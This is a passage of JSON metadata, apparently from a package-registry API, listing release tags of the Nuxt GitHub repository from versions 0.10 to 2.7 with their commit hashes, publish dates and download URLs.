cosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.1.0/manifests"},{"name":"v2.0.0","sha":"7a68e1dde17e0ed7eb7598d9c63ca1ac2383b76e","kind":"commit","published_at":"2018-09-20T21:57:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.0.0/manifests"},{"name":"v1.4.2","sha":"376dd35ba9465e1163a800bd0512654f68436b5f","kind":"tag","published_at":"2018-08-01T19:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.2/manifests"},{"name":"v1.4.1","sha":"5b7e27a1af4aa0d212766513693949f9d7917bd5","kind":"tag","published_at":"2018-06-06T13:01:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nux